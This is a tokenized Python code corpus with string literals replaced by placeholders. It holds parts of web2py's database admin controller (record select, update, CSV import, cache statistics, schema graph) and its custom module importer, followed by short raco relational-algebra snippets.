( form = form , table = db [ table ] ) <EOL> def download ( ) : <EOL> import os <EOL> db = get_database ( request ) <EOL> return response . download ( request , db ) <EOL> def csv ( ) : <EOL> import gluon . contenttype <EOL> response . headers [ '<STR_LIT:Content-Type>' ] = gluon . contenttype . contenttype ( '<STR_LIT>' ) <EOL> db = get_database ( request ) <EOL> query = get_query ( request ) <EOL> if not query : <EOL> return None <EOL> response . headers [ '<STR_LIT>' ] = '<STR_LIT>' % tuple ( request . vars . query . split ( '<STR_LIT:.>' ) [ : <NUM_LIT:2> ] ) <EOL> return str ( db ( query , ignore_common_filters = True ) . select ( ) ) <EOL> def import_csv ( table , file ) : <EOL> table . import_from_csv_file ( file ) <EOL> def select ( ) : <EOL> import re <EOL> db = get_database ( request ) <EOL> dbname = request . args [ <NUM_LIT:0> ] <EOL> try : <EOL> is_imap = db . _uri . 
startswith ( "<STR_LIT>" ) <EOL> except ( KeyError , AttributeError , TypeError ) : <EOL> is_imap = False <EOL> regex = re . compile ( '<STR_LIT>' ) <EOL> if len ( request . args ) > <NUM_LIT:1> and hasattr ( db [ request . args [ <NUM_LIT:1> ] ] , '<STR_LIT>' ) : <EOL> regex = re . compile ( '<STR_LIT>' ) <EOL> if request . vars . query : <EOL> match = regex . match ( request . vars . query ) <EOL> if match : <EOL> request . vars . query = '<STR_LIT>' % ( request . args [ <NUM_LIT:0> ] , <EOL> match . group ( '<STR_LIT>' ) , match . group ( '<STR_LIT>' ) , <EOL> match . group ( '<STR_LIT:value>' ) ) <EOL> else : <EOL> request . vars . query = session . last_query <EOL> query = get_query ( request ) <EOL> if request . vars . start : <EOL> start = int ( request . vars . start ) <EOL> else : <EOL> start = <NUM_LIT:0> <EOL> nrows = <NUM_LIT:0> <EOL> step = <NUM_LIT:100> <EOL> fields = [ ] <EOL> if is_imap : <EOL> step = <NUM_LIT:3> <EOL> stop = start + step <EOL> table = None <EOL> rows = [ ] <EOL> orderby = request . vars . orderby <EOL> if orderby : <EOL> orderby = dbname + '<STR_LIT:.>' + orderby <EOL> if orderby == session . last_orderby : <EOL> if orderby [ <NUM_LIT:0> ] == '<STR_LIT>' : <EOL> orderby = orderby [ <NUM_LIT:1> : ] <EOL> else : <EOL> orderby = '<STR_LIT>' + orderby <EOL> session . last_orderby = orderby <EOL> session . last_query = request . vars . query <EOL> form = FORM ( TABLE ( TR ( T ( '<STR_LIT>' ) , '<STR_LIT>' , INPUT ( _style = '<STR_LIT>' , <EOL> _name = '<STR_LIT>' , _value = request . vars . query or '<STR_LIT>' , <EOL> requires = IS_NOT_EMPTY ( <EOL> error_message = T ( "<STR_LIT>" ) ) ) ) , TR ( T ( '<STR_LIT>' ) , <EOL> INPUT ( _name = '<STR_LIT>' , _type = '<STR_LIT>' , <EOL> value = False ) , INPUT ( _style = '<STR_LIT>' , <EOL> _name = '<STR_LIT>' , _value = request . vars . 
update_fields <EOL> or '<STR_LIT>' ) ) , TR ( T ( '<STR_LIT>' ) , INPUT ( _name = '<STR_LIT>' , <EOL> _class = '<STR_LIT>' , _type = '<STR_LIT>' , value = False ) , '<STR_LIT>' ) , <EOL> TR ( '<STR_LIT>' , '<STR_LIT>' , INPUT ( _type = '<STR_LIT>' , _value = T ( '<STR_LIT>' ) ) ) ) , <EOL> _action = URL ( r = request , args = request . args ) ) <EOL> tb = None <EOL> if form . accepts ( request . vars , formname = None ) : <EOL> regex = re . compile ( request . args [ <NUM_LIT:0> ] + '<STR_LIT>' ) <EOL> match = regex . match ( form . vars . query . strip ( ) ) <EOL> if match : <EOL> table = match . group ( '<STR_LIT>' ) <EOL> try : <EOL> nrows = db ( query , ignore_common_filters = True ) . count ( ) <EOL> if form . vars . update_check and form . vars . update_fields : <EOL> db ( query , ignore_common_filters = True ) . update ( <EOL> ** eval_in_global_env ( '<STR_LIT>' % form . vars . update_fields ) ) <EOL> response . flash = T ( '<STR_LIT>' , nrows ) <EOL> elif form . vars . delete_check : <EOL> db ( query , ignore_common_filters = True ) . delete ( ) <EOL> response . flash = T ( '<STR_LIT>' , nrows ) <EOL> nrows = db ( query , ignore_common_filters = True ) . count ( ) <EOL> if is_imap : <EOL> fields = [ db [ table ] [ name ] for name in <EOL> ( "<STR_LIT:id>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT:to>" , <EOL> "<STR_LIT>" , "<STR_LIT>" ) ] <EOL> if orderby : <EOL> rows = db ( query , ignore_common_filters = True ) . select ( <EOL> * fields , limitby = ( start , stop ) , <EOL> orderby = eval_in_global_env ( orderby ) ) <EOL> else : <EOL> rows = db ( query , ignore_common_filters = True ) . select ( <EOL> * fields , limitby = ( start , stop ) ) <EOL> except Exception , e : <EOL> import traceback <EOL> tb = traceback . format_exc ( ) <EOL> ( rows , nrows ) = ( [ ] , <NUM_LIT:0> ) <EOL> response . flash = DIV ( T ( '<STR_LIT>' ) , PRE ( str ( e ) ) ) <EOL> csv_table = table or request . vars . 
table <EOL> if csv_table : <EOL> formcsv = FORM ( str ( T ( '<STR_LIT>' ) ) + "<STR_LIT:U+0020>" , <EOL> INPUT ( _type = '<STR_LIT:file>' , _name = '<STR_LIT>' ) , <EOL> INPUT ( _type = '<STR_LIT>' , _value = csv_table , _name = '<STR_LIT>' ) , <EOL> INPUT ( _type = '<STR_LIT>' , _value = T ( '<STR_LIT>' ) ) ) <EOL> else : <EOL> formcsv = None <EOL> if formcsv and formcsv . process ( ) . accepted : <EOL> try : <EOL> import_csv ( db [ request . vars . table ] , <EOL> request . vars . csvfile . file ) <EOL> response . flash = T ( '<STR_LIT>' ) <EOL> except Exception , e : <EOL> response . flash = DIV ( T ( '<STR_LIT>' ) , PRE ( str ( e ) ) ) <EOL> return dict ( <EOL> form = form , <EOL> table = table , <EOL> start = start , <EOL> stop = stop , <EOL> step = step , <EOL> nrows = nrows , <EOL> rows = rows , <EOL> query = request . vars . query , <EOL> formcsv = formcsv , <EOL> tb = tb <EOL> ) <EOL> def update ( ) : <EOL> ( db , table ) = get_table ( request ) <EOL> keyed = hasattr ( db [ table ] , '<STR_LIT>' ) <EOL> record = None <EOL> db [ table ] . _common_filter = None <EOL> if keyed : <EOL> key = [ f for f in request . vars if f in db [ table ] . _primarykey ] <EOL> if key : <EOL> record = db ( db [ table ] [ key [ <NUM_LIT:0> ] ] == request . vars [ key [ <EOL> <NUM_LIT:0> ] ] ) . select ( ) . first ( ) <EOL> else : <EOL> record = db ( db [ table ] . id == request . args ( <EOL> <NUM_LIT:2> ) ) . select ( ) . first ( ) <EOL> if not record : <EOL> qry = query_by_table_type ( table , db ) <EOL> session . flash = T ( '<STR_LIT>' ) <EOL> redirect ( URL ( '<STR_LIT>' , args = request . args [ : <NUM_LIT:1> ] , <EOL> vars = dict ( query = qry ) ) ) <EOL> if keyed : <EOL> for k in db [ table ] . _primarykey : <EOL> db [ table ] [ k ] . writable = False <EOL> form = SQLFORM ( <EOL> db [ table ] , record , deletable = True , delete_label = T ( '<STR_LIT>' ) , <EOL> ignore_rw = ignore_rw and not keyed , <EOL> linkto = URL ( '<STR_LIT>' , <EOL> args = request . 
args [ : <NUM_LIT:1> ] ) , upload = URL ( r = request , <EOL> f = '<STR_LIT>' , args = request . args [ : <NUM_LIT:1> ] ) ) <EOL> if form . accepts ( request . vars , session ) : <EOL> session . flash = T ( '<STR_LIT>' ) <EOL> qry = query_by_table_type ( table , db ) <EOL> redirect ( URL ( '<STR_LIT>' , args = request . args [ : <NUM_LIT:1> ] , <EOL> vars = dict ( query = qry ) ) ) <EOL> return dict ( form = form , table = db [ table ] ) <EOL> def state ( ) : <EOL> return dict ( ) <EOL> def ccache ( ) : <EOL> cache . ram . initialize ( ) <EOL> cache . disk . initialize ( ) <EOL> form = FORM ( <EOL> P ( TAG . BUTTON ( <EOL> T ( "<STR_LIT>" ) , _type = "<STR_LIT>" , _name = "<STR_LIT:yes>" , _value = "<STR_LIT:yes>" ) ) , <EOL> P ( TAG . BUTTON ( <EOL> T ( "<STR_LIT>" ) , _type = "<STR_LIT>" , _name = "<STR_LIT>" , _value = "<STR_LIT>" ) ) , <EOL> P ( TAG . BUTTON ( <EOL> T ( "<STR_LIT>" ) , _type = "<STR_LIT>" , _name = "<STR_LIT>" , _value = "<STR_LIT>" ) ) , <EOL> ) <EOL> if form . accepts ( request . vars , session ) : <EOL> clear_ram = False <EOL> clear_disk = False <EOL> session . flash = "<STR_LIT>" <EOL> if request . vars . yes : <EOL> clear_ram = clear_disk = True <EOL> if request . vars . ram : <EOL> clear_ram = True <EOL> if request . vars . disk : <EOL> clear_disk = True <EOL> if clear_ram : <EOL> cache . ram . clear ( ) <EOL> session . flash += T ( "<STR_LIT>" ) <EOL> if clear_disk : <EOL> cache . disk . clear ( ) <EOL> session . 
flash += T ( "<STR_LIT>" ) <EOL> redirect ( URL ( r = request ) ) <EOL> try : <EOL> from guppy import hpy <EOL> hp = hpy ( ) <EOL> except ImportError : <EOL> hp = False <EOL> import shelve <EOL> import os <EOL> import copy <EOL> import time <EOL> import math <EOL> from gluon import portalocker <EOL> ram = { <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : time . time ( ) , <EOL> '<STR_LIT>' : [ ] <EOL> } <EOL> disk = copy . copy ( ram ) <EOL> total = copy . copy ( ram ) <EOL> disk [ '<STR_LIT>' ] = [ ] <EOL> total [ '<STR_LIT>' ] = [ ] <EOL> def GetInHMS ( seconds ) : <EOL> hours = math . floor ( seconds / <NUM_LIT> ) <EOL> seconds -= hours * <NUM_LIT> <EOL> minutes = math . floor ( seconds / <NUM_LIT> ) <EOL> seconds -= minutes * <NUM_LIT> <EOL> seconds = math . floor ( seconds ) <EOL> return ( hours , minutes , seconds ) <EOL> for key , value in cache . ram . storage . iteritems ( ) : <EOL> if isinstance ( value , dict ) : <EOL> ram [ '<STR_LIT>' ] = value [ '<STR_LIT>' ] - value [ '<STR_LIT>' ] <EOL> ram [ '<STR_LIT>' ] = value [ '<STR_LIT>' ] <EOL> try : <EOL> ram [ '<STR_LIT>' ] = ram [ '<STR_LIT>' ] * <NUM_LIT:100> / value [ '<STR_LIT>' ] <EOL> except ( KeyError , ZeroDivisionError ) : <EOL> ram [ '<STR_LIT>' ] = <NUM_LIT:0> <EOL> else : <EOL> if hp : <EOL> ram [ '<STR_LIT>' ] += hp . iso ( value [ <NUM_LIT:1> ] ) . size <EOL> ram [ '<STR_LIT>' ] += hp . iso ( value [ <NUM_LIT:1> ] ) . count <EOL> ram [ '<STR_LIT>' ] += <NUM_LIT:1> <EOL> if value [ <NUM_LIT:0> ] < ram [ '<STR_LIT>' ] : <EOL> ram [ '<STR_LIT>' ] = value [ <NUM_LIT:0> ] <EOL> ram [ '<STR_LIT>' ] . append ( ( key , GetInHMS ( time . time ( ) - value [ <NUM_LIT:0> ] ) ) ) <EOL> folder = os . path . join ( request . folder , '<STR_LIT>' ) <EOL> if not os . path . exists ( folder ) : <EOL> os . 
mkdir ( folder ) <EOL> locker = open ( os . path . join ( folder , '<STR_LIT>' ) , '<STR_LIT:a>' ) <EOL> portalocker . lock ( locker , portalocker . LOCK_EX ) <EOL> disk_storage = shelve . open ( <EOL> os . path . join ( folder , '<STR_LIT>' ) ) <EOL> try : <EOL> for key , value in disk_storage . items ( ) : <EOL> if isinstance ( value , dict ) : <EOL> disk [ '<STR_LIT>' ] = value [ '<STR_LIT>' ] - value [ '<STR_LIT>' ] <EOL> disk [ '<STR_LIT>' ] = value [ '<STR_LIT>' ] <EOL> try : <EOL> disk [ '<STR_LIT>' ] = disk [ '<STR_LIT>' ] * <NUM_LIT:100> / value [ '<STR_LIT>' ] <EOL> except ( KeyError , ZeroDivisionError ) : <EOL> disk [ '<STR_LIT>' ] = <NUM_LIT:0> <EOL> else : <EOL> if hp : <EOL> disk [ '<STR_LIT>' ] += hp . iso ( value [ <NUM_LIT:1> ] ) . size <EOL> disk [ '<STR_LIT>' ] += hp . iso ( value [ <NUM_LIT:1> ] ) . count <EOL> disk [ '<STR_LIT>' ] += <NUM_LIT:1> <EOL> if value [ <NUM_LIT:0> ] < disk [ '<STR_LIT>' ] : <EOL> disk [ '<STR_LIT>' ] = value [ <NUM_LIT:0> ] <EOL> disk [ '<STR_LIT>' ] . append ( ( key , GetInHMS ( time . time ( ) - value [ <NUM_LIT:0> ] ) ) ) <EOL> finally : <EOL> portalocker . unlock ( locker ) <EOL> locker . close ( ) <EOL> disk_storage . 
close ( ) <EOL> total [ '<STR_LIT>' ] = ram [ '<STR_LIT>' ] + disk [ '<STR_LIT>' ] <EOL> total [ '<STR_LIT>' ] = ram [ '<STR_LIT>' ] + disk [ '<STR_LIT>' ] <EOL> total [ '<STR_LIT>' ] = ram [ '<STR_LIT>' ] + disk [ '<STR_LIT>' ] <EOL> total [ '<STR_LIT>' ] = ram [ '<STR_LIT>' ] + disk [ '<STR_LIT>' ] <EOL> total [ '<STR_LIT>' ] = ram [ '<STR_LIT>' ] + disk [ '<STR_LIT>' ] <EOL> total [ '<STR_LIT>' ] = ram [ '<STR_LIT>' ] + disk [ '<STR_LIT>' ] <EOL> try : <EOL> total [ '<STR_LIT>' ] = total [ '<STR_LIT>' ] * <NUM_LIT:100> / ( total [ '<STR_LIT>' ] + <EOL> total [ '<STR_LIT>' ] ) <EOL> except ( KeyError , ZeroDivisionError ) : <EOL> total [ '<STR_LIT>' ] = <NUM_LIT:0> <EOL> if disk [ '<STR_LIT>' ] < ram [ '<STR_LIT>' ] : <EOL> total [ '<STR_LIT>' ] = disk [ '<STR_LIT>' ] <EOL> else : <EOL> total [ '<STR_LIT>' ] = ram [ '<STR_LIT>' ] <EOL> ram [ '<STR_LIT>' ] = GetInHMS ( time . time ( ) - ram [ '<STR_LIT>' ] ) <EOL> disk [ '<STR_LIT>' ] = GetInHMS ( time . time ( ) - disk [ '<STR_LIT>' ] ) <EOL> total [ '<STR_LIT>' ] = GetInHMS ( time . time ( ) - total [ '<STR_LIT>' ] ) <EOL> def key_table ( keys ) : <EOL> return TABLE ( <EOL> TR ( TD ( B ( T ( '<STR_LIT>' ) ) ) , TD ( B ( T ( '<STR_LIT>' ) ) ) ) , <EOL> * [ TR ( TD ( k [ <NUM_LIT:0> ] ) , TD ( '<STR_LIT>' % k [ <NUM_LIT:1> ] ) ) for k in keys ] , <EOL> ** dict ( _class = '<STR_LIT>' , <EOL> _style = "<STR_LIT>" ) ) <EOL> ram [ '<STR_LIT>' ] = key_table ( ram [ '<STR_LIT>' ] ) <EOL> disk [ '<STR_LIT>' ] = key_table ( disk [ '<STR_LIT>' ] ) <EOL> total [ '<STR_LIT>' ] = key_table ( total [ '<STR_LIT>' ] ) <EOL> return dict ( form = form , total = total , <EOL> ram = ram , disk = disk , object_stats = hp != False ) <EOL> def table_template ( table ) : <EOL> from gluon . html import TR , TD , TABLE , TAG <EOL> def FONT ( * args , ** kwargs ) : <EOL> return TAG . font ( * args , ** kwargs ) <EOL> def types ( field ) : <EOL> f_type = field . 
type <EOL> if not isinstance ( f_type , str ) : <EOL> return '<STR_LIT:U+0020>' <EOL> elif f_type == '<STR_LIT:string>' : <EOL> return field . length <EOL> elif f_type == '<STR_LIT:id>' : <EOL> return B ( '<STR_LIT>' ) <EOL> elif f_type . startswith ( '<STR_LIT>' ) or f_type . startswith ( '<STR_LIT>' ) : <EOL> return B ( '<STR_LIT>' ) <EOL> else : <EOL> return '<STR_LIT:U+0020>' <EOL> rows = [ ] <EOL> cellpadding = <NUM_LIT:4> <EOL> color = "<STR_LIT>" <EOL> bgcolor = "<STR_LIT>" <EOL> face = "<STR_LIT>" <EOL> face_bold = "<STR_LIT>" <EOL> border = <NUM_LIT:0> <EOL> rows . append ( TR ( TD ( FONT ( table , _face = face_bold , _color = bgcolor ) , <EOL> _colspan = <NUM_LIT:3> , _cellpadding = cellpadding , <EOL> _align = "<STR_LIT>" , _bgcolor = color ) ) ) <EOL> for row in db [ table ] : <EOL> rows . append ( TR ( TD ( FONT ( row . name , _color = color , _face = face_bold ) , <EOL> _align = "<STR_LIT:left>" , _cellpadding = cellpadding , <EOL> _border = border ) , <EOL> TD ( FONT ( row . type , _color = color , _face = face ) , <EOL> _align = "<STR_LIT:left>" , _cellpadding = cellpadding , <EOL> _border = border ) , <EOL> TD ( FONT ( types ( row ) , _color = color , _face = face ) , <EOL> _align = "<STR_LIT>" , _cellpadding = cellpadding , <EOL> _border = border ) ) ) <EOL> return "<STR_LIT>" % TABLE ( * rows , ** dict ( _bgcolor = bgcolor , _border = <NUM_LIT:1> , <EOL> _cellborder = <NUM_LIT:0> , _cellspacing = <NUM_LIT:0> ) <EOL> ) . xml ( ) <EOL> def bg_graph_model ( ) : <EOL> graph = pgv . AGraph ( layout = '<STR_LIT>' , directed = True , strict = False , rankdir = '<STR_LIT>' ) <EOL> subgraphs = dict ( ) <EOL> for tablename in db . tables : <EOL> if hasattr ( db [ tablename ] , '<STR_LIT>' ) : <EOL> meta_graphmodel = db [ tablename ] . _meta_graphmodel <EOL> else : <EOL> meta_graphmodel = dict ( group = '<STR_LIT>' , color = '<STR_LIT>' ) <EOL> group = meta_graphmodel [ '<STR_LIT>' ] . replace ( '<STR_LIT:U+0020>' , '<STR_LIT>' ) <EOL> if not subgraphs . 
has_key ( group ) : <EOL> subgraphs [ group ] = dict ( meta = meta_graphmodel , tables = [ ] ) <EOL> subgraphs [ group ] [ '<STR_LIT>' ] . append ( tablename ) <EOL> else : <EOL> subgraphs [ group ] [ '<STR_LIT>' ] . append ( tablename ) <EOL> graph . add_node ( tablename , name = tablename , shape = '<STR_LIT>' , <EOL> label = table_template ( tablename ) ) <EOL> for n , key in enumerate ( subgraphs . iterkeys ( ) ) : <EOL> graph . subgraph ( nbunch = subgraphs [ key ] [ '<STR_LIT>' ] , <EOL> name = '<STR_LIT>' % n , <EOL> style = '<STR_LIT>' , <EOL> color = subgraphs [ key ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] , <EOL> label = subgraphs [ key ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] ) <EOL> for tablename in db . tables : <EOL> for field in db [ tablename ] : <EOL> f_type = field . type <EOL> if isinstance ( f_type , str ) and ( <EOL> f_type . startswith ( '<STR_LIT>' ) or <EOL> f_type . startswith ( '<STR_LIT>' ) ) : <EOL> referenced_table = f_type . split ( ) [ <NUM_LIT:1> ] . split ( '<STR_LIT:.>' ) [ <NUM_LIT:0> ] <EOL> n1 = graph . get_node ( tablename ) <EOL> n2 = graph . get_node ( referenced_table ) <EOL> graph . add_edge ( n1 , n2 , color = "<STR_LIT>" , label = '<STR_LIT>' ) <EOL> graph . layout ( ) <EOL> if not request . args : <EOL> response . headers [ '<STR_LIT:Content-Type>' ] = '<STR_LIT>' <EOL> return graph . draw ( format = '<STR_LIT>' , prog = '<STR_LIT>' ) <EOL> else : <EOL> response . headers [ '<STR_LIT>' ] = '<STR_LIT>' % request . args ( <NUM_LIT:0> ) <EOL> if request . args ( <NUM_LIT:0> ) == '<STR_LIT>' : <EOL> return graph . string ( ) <EOL> else : <EOL> return graph . draw ( format = request . args ( <NUM_LIT:0> ) , prog = '<STR_LIT>' ) <EOL> def graph_model ( ) : <EOL> return dict ( databases = databases , pgv = pgv ) <EOL> def manage ( ) : <EOL> tables = manager_action [ '<STR_LIT>' ] <EOL> if isinstance ( tables [ <NUM_LIT:0> ] , str ) : <EOL> db = manager_action . get ( '<STR_LIT>' , auth . 
db ) <EOL> db = globals ( ) [ db ] if isinstance ( db , str ) else db <EOL> tables = [ db [ table ] for table in tables ] <EOL> if request . args ( <NUM_LIT:0> ) == '<STR_LIT>' : <EOL> auth . table_user ( ) . _plural = T ( '<STR_LIT>' ) <EOL> auth . table_group ( ) . _plural = T ( '<STR_LIT>' ) <EOL> auth . table_membership ( ) . _plural = T ( '<STR_LIT>' ) <EOL> auth . table_permission ( ) . _plural = T ( '<STR_LIT>' ) <EOL> if request . extension != '<STR_LIT>' : <EOL> return dict ( heading = manager_action . get ( '<STR_LIT>' , <EOL> T ( '<STR_LIT>' ) % dict ( action = request . args ( <NUM_LIT:0> ) . replace ( '<STR_LIT:_>' , '<STR_LIT:U+0020>' ) . title ( ) ) ) , <EOL> tablenames = [ table . _tablename for table in tables ] , <EOL> labels = [ table . _plural . title ( ) for table in tables ] ) <EOL> table = tables [ request . args ( <NUM_LIT:1> , cast = int ) ] <EOL> formname = '<STR_LIT>' % table . _tablename <EOL> linked_tables = orderby = None <EOL> if request . args ( <NUM_LIT:0> ) == '<STR_LIT>' : <EOL> auth . table_group ( ) . _id . readable = auth . table_membership ( ) . _id . readable = auth . table_permission ( ) . _id . readable = False <EOL> auth . table_membership ( ) . user_id . label = T ( '<STR_LIT>' ) <EOL> auth . table_membership ( ) . group_id . label = T ( '<STR_LIT>' ) <EOL> auth . table_permission ( ) . group_id . label = T ( '<STR_LIT>' ) <EOL> auth . table_permission ( ) . name . label = T ( '<STR_LIT>' ) <EOL> if table == auth . table_user ( ) : <EOL> linked_tables = [ auth . settings . table_membership_name ] <EOL> elif table == auth . table_group ( ) : <EOL> orderby = '<STR_LIT>' if not request . args ( <NUM_LIT:3> ) or '<STR_LIT>' not in request . args ( <NUM_LIT:3> ) else None <EOL> elif table == auth . table_permission ( ) : <EOL> orderby = '<STR_LIT>' <EOL> kwargs = dict ( user_signature = True , maxtextlength = <NUM_LIT:1000> , <EOL> orderby = orderby , linked_tables = linked_tables ) <EOL> smartgrid_args = manager_action . 
get ( '<STR_LIT>' , { } ) <EOL> kwargs . update ( ** smartgrid_args . get ( '<STR_LIT>' , { } ) ) <EOL> kwargs . update ( ** smartgrid_args . get ( table . _tablename , { } ) ) <EOL> grid = SQLFORM . smartgrid ( table , args = request . args [ : <NUM_LIT:2> ] , formname = formname , ** kwargs ) <EOL> return grid </s>
<s> import __builtin__ <EOL> import os <EOL> import sys <EOL> import threading <EOL> import traceback <EOL> from gluon import current <EOL> NATIVE_IMPORTER = __builtin__ . __import__ <EOL> INVALID_MODULES = set ( ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> def custom_import_install ( ) : <EOL> if __builtin__ . __import__ == NATIVE_IMPORTER : <EOL> INVALID_MODULES . update ( sys . modules . keys ( ) ) <EOL> __builtin__ . __import__ = custom_importer <EOL> def track_changes ( track = True ) : <EOL> assert track in ( True , False ) , "<STR_LIT>" <EOL> current . request . _custom_import_track_changes = track <EOL> def is_tracking_changes ( ) : <EOL> return current . request . _custom_import_track_changes <EOL> class CustomImportException ( ImportError ) : <EOL> pass <EOL> def custom_importer ( name , globals = None , locals = None , fromlist = None , level = - <NUM_LIT:1> ) : <EOL> """<STR_LIT>""" <EOL> globals = globals or { } <EOL> locals = locals or { } <EOL> fromlist = fromlist or [ ] <EOL> try : <EOL> if current . request . _custom_import_track_changes : <EOL> base_importer = TRACK_IMPORTER <EOL> else : <EOL> base_importer = NATIVE_IMPORTER <EOL> except : <EOL> base_importer = NATIVE_IMPORTER <EOL> if hasattr ( current , '<STR_LIT>' ) and level <= <NUM_LIT:0> and not name . partition ( '<STR_LIT:.>' ) [ <NUM_LIT:0> ] in INVALID_MODULES and isinstance ( globals , dict ) : <EOL> import_tb = None <EOL> try : <EOL> try : <EOL> oname = name if not name . startswith ( '<STR_LIT:.>' ) else '<STR_LIT:.>' + name <EOL> return NATIVE_IMPORTER ( oname , globals , locals , fromlist , level ) <EOL> except ImportError : <EOL> items = current . request . folder . split ( os . path . sep ) <EOL> if not items [ - <NUM_LIT:1> ] : <EOL> items = items [ : - <NUM_LIT:1> ] <EOL> modules_prefix = '<STR_LIT:.>' . join ( items [ - <NUM_LIT:2> : ] ) + '<STR_LIT>' <EOL> if not fromlist : <EOL> result = None <EOL> for itemname in name . 
split ( "<STR_LIT:.>" ) : <EOL> new_mod = base_importer ( <EOL> modules_prefix , globals , locals , [ itemname ] , level ) <EOL> try : <EOL> result = result or new_mod . __dict__ [ itemname ] <EOL> except KeyError , e : <EOL> raise ImportError , '<STR_LIT>' % str ( e ) <EOL> modules_prefix += "<STR_LIT:.>" + itemname <EOL> return result <EOL> else : <EOL> pname = modules_prefix + "<STR_LIT:.>" + name <EOL> return base_importer ( pname , globals , locals , fromlist , level ) <EOL> except ImportError , e1 : <EOL> import_tb = sys . exc_info ( ) [ <NUM_LIT:2> ] <EOL> try : <EOL> return NATIVE_IMPORTER ( name , globals , locals , fromlist , level ) <EOL> except ImportError , e3 : <EOL> raise ImportError , e1 , import_tb <EOL> except Exception , e2 : <EOL> raise e2 <EOL> finally : <EOL> if import_tb : <EOL> import_tb = None <EOL> return NATIVE_IMPORTER ( name , globals , locals , fromlist , level ) <EOL> class TrackImporter ( object ) : <EOL> """<STR_LIT>""" <EOL> THREAD_LOCAL = threading . local ( ) <EOL> PACKAGE_PATH_SUFFIX = os . path . sep + "<STR_LIT>" <EOL> def __init__ ( self ) : <EOL> self . _import_dates = { } <EOL> def __call__ ( self , name , globals = None , locals = None , fromlist = None , level = - <NUM_LIT:1> ) : <EOL> """<STR_LIT>""" <EOL> globals = globals or { } <EOL> locals = locals or { } <EOL> fromlist = fromlist or [ ] <EOL> try : <EOL> self . _update_dates ( name , globals , locals , fromlist , level ) <EOL> result = NATIVE_IMPORTER ( name , globals , locals , fromlist , level ) <EOL> self . _update_dates ( name , globals , locals , fromlist , level ) <EOL> return result <EOL> except Exception , e : <EOL> raise <EOL> def _update_dates ( self , name , globals , locals , fromlist , level ) : <EOL> """<STR_LIT>""" <EOL> self . _reload_check ( name , globals , locals , level ) <EOL> for fromlist_name in fromlist or [ ] : <EOL> pname = "<STR_LIT>" % ( name , fromlist_name ) <EOL> self . 
_reload_check ( pname , globals , locals , level ) <EOL> def _reload_check ( self , name , globals , locals , level ) : <EOL> """<STR_LIT>""" <EOL> module = sys . modules . get ( name ) <EOL> file = self . _get_module_file ( module ) <EOL> if file : <EOL> date = self . _import_dates . get ( file ) <EOL> new_date = None <EOL> reload_mod = False <EOL> mod_to_pack = False <EOL> try : <EOL> new_date = os . path . getmtime ( file ) <EOL> except : <EOL> self . _import_dates . pop ( file , None ) <EOL> if file . endswith ( "<STR_LIT>" ) : <EOL> file = os . path . splitext ( file ) [ <NUM_LIT:0> ] <EOL> reload_mod = os . path . isdir ( file ) and os . path . isfile ( file + self . PACKAGE_PATH_SUFFIX ) <EOL> mod_to_pack = reload_mod <EOL> else : <EOL> file += "<STR_LIT>" <EOL> reload_mod = os . path . isfile ( file ) <EOL> if reload_mod : <EOL> new_date = os . path . getmtime ( file ) <EOL> if reload_mod or not date or new_date > date : <EOL> self . _import_dates [ file ] = new_date <EOL> if reload_mod or ( date and new_date > date ) : <EOL> if mod_to_pack : <EOL> mod_name = module . __name__ <EOL> del sys . modules [ mod_name ] <EOL> NATIVE_IMPORTER ( mod_name , globals , locals , [ ] , level ) <EOL> else : <EOL> reload ( module ) <EOL> def _get_module_file ( self , module ) : <EOL> """<STR_LIT>""" <EOL> file = getattr ( module , "<STR_LIT>" , None ) <EOL> if file : <EOL> file = os . path . splitext ( file ) [ <NUM_LIT:0> ] + "<STR_LIT>" <EOL> if file . endswith ( self . PACKAGE_PATH_SUFFIX ) : <EOL> file = os . path . dirname ( file ) <EOL> return file <EOL> TRACK_IMPORTER = TrackImporter ( ) </s>
<s> from raco . compile import compile , optimize <EOL> from raco . expression . boolean import EQ , AND , OR <EOL> from raco . expression import NamedAttributeRef , StringLiteral , NumericLiteral <EOL> import raco . scheme <EOL> import raco . catalog <EOL> sch = raco . scheme . Scheme ( [ ( "<STR_LIT>" , int ) , ( "<STR_LIT>" , int ) , ( "<STR_LIT:object>" , int ) ] ) <EOL> trialdat = raco . catalog . ASCIIFile ( "<STR_LIT>" , sch ) <EOL> print sch <EOL> R = Scan ( trialdat , sch ) <EOL> print R . scheme ( ) <EOL> sR = Select ( EQ ( NamedAttributeRef ( "<STR_LIT>" ) , NumericLiteral ( <NUM_LIT> ) ) , R ) <EOL> sS = Select ( EQ ( NamedAttributeRef ( "<STR_LIT>" ) , NumericLiteral ( <NUM_LIT> ) ) , R ) <EOL> sT = Select ( EQ ( NamedAttributeRef ( "<STR_LIT:object>" ) , NumericLiteral ( <NUM_LIT> ) ) , R ) <EOL> sRsS = Join ( [ ( "<STR_LIT:object>" , "<STR_LIT>" ) ] , sR , sS ) <EOL> sRsSsT = Join ( [ ( "<STR_LIT:object>" , "<STR_LIT>" ) ] , sRsS , sT ) <EOL> result = optimize ( [ ( "<STR_LIT>" , sT ) ] , CCAlgebra ) <EOL> print compile ( result ) </s>
<s> from sparql import * </s>
<s> import collections <EOL> Function = collections . namedtuple ( '<STR_LIT>' , [ '<STR_LIT:args>' , '<STR_LIT>' ] ) <EOL> StatefulFunc = collections . namedtuple ( <EOL> '<STR_LIT>' , [ '<STR_LIT:args>' , '<STR_LIT>' , "<STR_LIT>" ] ) </s>
